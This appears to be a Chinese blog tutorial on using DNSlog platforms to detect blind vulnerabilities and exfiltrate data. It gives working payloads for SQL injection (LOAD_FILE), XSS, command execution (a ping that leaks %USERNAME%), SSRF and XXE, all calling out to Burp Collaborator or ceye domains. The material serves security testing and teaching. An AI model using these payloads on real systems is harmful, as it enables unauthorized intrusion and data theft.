大家好,欢迎来到IT知识分享网。
什么是DNSlog
DNSlog就是存储在DNS Server上的域名信息,它记录着用户对域名的访问信息,类似日志文件。
原理
payload放到目标网址(也就是dnslog的域名)的子域名处,让存在漏洞的地方去解析,由于解析了域名,发起DNS请求,DNS在解析的时候会留下日志,这些日志会反弹到dnslog的平台上,通过读取这些解析的日志,来获取信息。
使用方法
通过Burp Suite
通过在线平台
http://www.dnslog.cn/
http://ceye.io/
利用场景
执行命令时没有回显的;sql、xss、ssrf、xxe、命令执行
sql注入
布尔盲注、时间盲注,需要频繁的跑请求才能够获取数据库中的值,在现代WAF的防护下,很可能导致IP被ban,所以在MySql的盲注时,可以利用内置函数load_file()来完成DNSLOG。load_file()不仅能够加载本地文件,同时也能对URL发起请求。
SELECT LOAD_FILE(CONCAT('\\\\',(要查询的语句),'.xx.xx.xx'));
xss
浏览器访问预设至的链接地址,如果DNSLog平台收到的DNS查询,即可证明存在XSS
<img src=http://xss.xxxx.ceye.io>
http://xss/level1.php?name=%3Cimg%20src=http://389spnjjms0is0cyzxu5cfa5gwmpae.burpcollaborator.net%3E
命令执行
有的命令执行的漏洞并没有回显,我们不能确定漏洞是否存在,也不知道我们输入的命令是否被执行,这种情况我们可以利用DNSLOG来获取命令的执行结果。
ping 系统变量名.地址
ping %USERNAME%.dn424xyt12fs7ar8e79frppfv611pq.burpcollaborator.net
SSRF
直接将ssrf中地址换成我们的dnslog平台
?url=er938y2u53jtbbv9i8dgvqtgz757tw.burpcollaborator.net/flag.php
XXE
使用参数实体,引用外部实体文件(目的地址是我们DNS服务器),二级或三级域名写成我们想要的信息,不加其他信息测试存在XXE。
<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://%USERNAME%.pnge49y51ef47mrkej9rr1prvi1hp6.burpcollaborator.net/">%remote;]>
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/20777.html
